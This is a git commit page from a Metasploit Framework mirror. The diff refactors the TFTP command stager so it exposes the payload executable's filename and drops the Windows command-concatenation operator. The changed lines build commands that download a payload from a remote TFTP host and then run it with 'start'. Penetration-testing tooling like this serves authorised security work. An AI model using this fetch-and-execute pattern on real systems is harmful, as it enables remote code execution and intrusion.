infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

expose the payload exe filename, remove the concat operator 

git-svn-id: file:///home/svn/framework3/trunk@10169 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-27 17:23:47 +00:00
parent a3a20ebb05
commit 8dd489ad3b
3 changed files with 15 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
lib/msf/core/exploit/cmdstager.rb
View File

@ -22,6 +22,7 @@ module Exploit::CmdStager
def initialize(info = {})
super
@cmd_list = nil
@stager_innstace = nil
end
@ -64,8 +65,8 @@ module Exploit::CmdStager
@exe = generate_exe
stager_instance = create_stager(@exe)
cmd_list = stager_instance.generate(opts)
@stager_instance = create_stager(@exe)
cmd_list = @stager_instance.generate(opts)
if (cmd_list.nil? or cmd_list.length < 1)
print_error("The command stager could not be generated")

5
lib/msf/core/exploit/cmdstager_tftp.rb
View File

@ -58,6 +58,11 @@ module Exploit::CmdStagerTFTP
def execute_cmdstager_end(opts)
stop_service
end
def payload_exe
return nil if not @stager_instance
@stager_instance.payload_exe
end
end

14
lib/rex/exploitation/cmdstager/tftp.rb
View File

@ -30,7 +30,7 @@ class CmdStagerTFTP < CmdStagerBase
def initialize(exe)
super
@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end
@ -40,10 +40,10 @@ class CmdStagerTFTP < CmdStagerBase
#
def compress_commands(cmds, opts)
# Initiate the download
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @var_payload_out}"
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
# Make it all happen
cmds << "start #{@tempdir + @var_payload_out}"
cmds << "start #{@tempdir + @payload_exe}"
# Clean up after unless requested not to..
if (not opts[:nodelete])
@ -53,11 +53,11 @@ class CmdStagerTFTP < CmdStagerBase
super
end
# Windows uses & to concat strings
def cmd_concat_operator
" & "
end
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
# the start command being issued separately so that it can ignore it :)
attr_reader :payload_exe
end
end
end